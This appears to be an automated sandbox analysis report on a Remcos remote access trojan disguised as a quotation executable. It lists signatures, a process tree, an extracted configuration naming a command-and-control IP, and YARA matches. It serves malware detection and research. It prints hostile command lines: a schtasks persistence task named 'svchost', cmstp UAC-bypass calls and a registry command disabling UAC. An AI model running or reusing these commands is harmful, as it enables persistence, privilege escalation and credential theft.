Edit tour

Windows Analysis Report
QUOTATION#30810.exe

Overview

General Information

Sample name:	QUOTATION#30810.exe
Analysis ID:	1435939
MD5:	c828227db6d7bc08dd8e9b7313a0e770
SHA1:	81a583b2e03ac3a7ad698ef8722fe30d5b67f3aa
SHA256:	9b2562b80e435348cffe99ad86776e9cef9b3f2745b170f297de739ff8d55509
Tags:	exe
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: Schedule system process

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files with benign system names

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Maps a DLL or memory area into another process

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Conhost Spawned By Uncommon Parent Process

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Uses Microsoft's Enhanced Cryptographic Provider

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION#30810.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\QUOTATION#30810.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6032 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2108 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 1896 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

svchost.exe (PID: 6092 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2772 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

csc.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

csc.exe (PID: 2536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

WerFault.exe (PID: 7080 cmdline: C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 5864 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_wp.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" MD5: EF2DCDFF05E9679F8D0E2895D9A2E3BB)

iexplore.exe (PID: 3068 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)

svchost.exe (PID: 5880 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wab.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

vbc.exe (PID: 4360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 1160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 5944 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 6836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 6068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

WerFault.exe (PID: 4312 cmdline: C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 5572 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmstp.exe (PID: 2824 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)

svchost.exe (PID: 6292 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5708 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 2220 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 1892 cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 7060 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6908 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ngen.exe (PID: 1112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)

WerFault.exe (PID: 6856 cmdline: C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 6020 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)

conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmstp.exe (PID: 908 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)

cmstp.exe (PID: 7104 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)

taskkill.exe (PID: 5816 cmdline: taskkill /IM cmstp.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "172.245.208.13:4445:0", "Assigned name": "JONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R7QS5C", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Temp\macatsxh.inf	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Windows\Temp\54bmrp0l.inf	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Windows\Temp\xrlumlnf.inf	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000003.1770951803.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000021.00000003.1770441759.000002453D690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000003.1770666779.000002453D690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000003.1770897911.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000021.00000003.1770638691.000002453D690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xe5fb0:$a1: Remcos restarted by watchdog! 0x15e9f8:$a1: Remcos restarted by watchdog! 0xe6528:$a3: %02i:%02i:%02i:%03i 0x15ef70:$a3: %02i:%02i:%02i:%03i
00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: QUOTATION#30810.exe PID: 4508	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QUOTATION#30810.exe PID: 4508	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 5864	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 5864	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 2772	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 2772	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 2772	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 2772	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x2434b:$a1: Remcos restarted by watchdog! 0x248a5:$a3: %02i:%02i:%02i:%03i 0x24cd4:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 5880	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 5880	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 5880	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xa075:$a1: Remcos restarted by watchdog! 0xa5cf:$a3: %02i:%02i:%02i:%03i 0xa9fe:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 5572	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 5572	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: vbc.exe PID: 4360	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: csc.exe PID: 6408	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: csc.exe PID: 6408	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: csc.exe PID: 6408	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb8c0:$a1: Remcos restarted by watchdog! 0xbe1a:$a3: %02i:%02i:%02i:%03i 0xc249:$a3: %02i:%02i:%02i:%03i
Process Memory Space: vbc.exe PID: 1160	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: cmstp.exe PID: 2824	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 6908	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: svchost.exe PID: 6908	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 6020	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ngen.exe PID: 1112	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: ngen.exe PID: 1112	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ngen.exe PID: 1112	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8903:$a1: Remcos restarted by watchdog! 0x8e5d:$a3: %02i:%02i:%02i:%03i 0x928c:$a3: %02i:%02i:%02i:%03i
Click to see the 59 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
